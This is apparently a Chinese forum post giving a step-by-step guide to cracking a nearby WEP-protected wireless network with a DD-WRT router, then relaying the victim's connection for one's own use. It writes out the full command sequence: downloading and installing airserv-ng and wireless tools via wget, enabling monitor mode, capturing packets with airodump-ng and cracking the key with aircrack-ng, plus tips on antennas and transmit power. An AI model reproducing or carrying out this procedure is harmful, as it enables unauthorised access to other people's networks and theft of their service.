使用 路由器 破解密码
利用无线路由的强力天线和dd-wrt的灵活性,破解wep加密的无线网络。因为brodcom芯片的dd-wrt驱动不支持injection注入来加快破解速度。所以只能守株待兔。
在dd-wrt上无线状态页最下面有Site Survey, 附近72db的wep加密。每秒钟只有几个包,开机一天抓到2w个,晚上回来瞬间破解出货。
dd-wrt(v24 rc5)上设置:
1. dd-wrt最好是mini版,web页面上打开jffs,用来安装程序。
2。web上status->wireless->site survey找到你要干掉的无线路由所在频道
然后把你的无线路由设置成ap模式,频道就是目标频道。
3. telnet到路由器,安装软件(破解完成後/jffs目录下这些软件都可以删掉):
cd /jffs
wget http://downloads.openwrt.org/whi ... 8.pre7-1_mipsel.ipk
ipkg install wireless-tools_28.pre7-1_mipsel.ipk
wget http://lvdong.net/steeven/airserv-ng
chmod 755 airserv-ng (对不起大家,这句漏了)
4. 开始**:
wl monitor 1
./airserv-ng -d prism0 & 这时应该可以看到启动信息,频道是1没关系。一样可以**你需要的频道。
5. 在电脑上下载http://lvdong.net/steeven/aircrack-ng-1.0-dev-win32.zip,
解压後进入cmd开始**路由器上的无线数据:airodump-ng.exe 192.168.1.1:666 --channel 11 -w dump。这个就是我们熟悉的抓包了。我的路由器ip是192.168.1.1,你的ip自己看去。11也要替换成那个要干活的频道。注意因为dd- wrt不能注入,守株待兔一秒钟只有几个. 我这一天等到2w个。
6. 如果数据够了,运行aircrack-ng.exe dump*.cap。 等着看结果吧
备注:
1. 如果对方信号强度不足大于80, 只能用来看看网页,速度很差。
2. 建议把无线路由放到窗口、阳台上,可以收到更多信号。
3. 成功後建议用dd-wrt的bridge模式来共享,即使对方信号很弱,有dd-wrt在窗口替你中继。
4. 有条件的可以给DD-wrt接高增益天线,比电脑接天线来的容易。
5. 如果信号很弱,中继的时候可以用dd-wrt调大发射功率试试。
6. 中继後,dd-wrt不能再做pppoe(adsl/网通/有线通)拨号,建议插入dd-wrt的普通口上,需要的时候在电脑上拨号。
7. dd-wrt能不能实现无线中继和已有固定宽带双重连接负载均衡?策略可以是ip段或者协议。
页:
[1]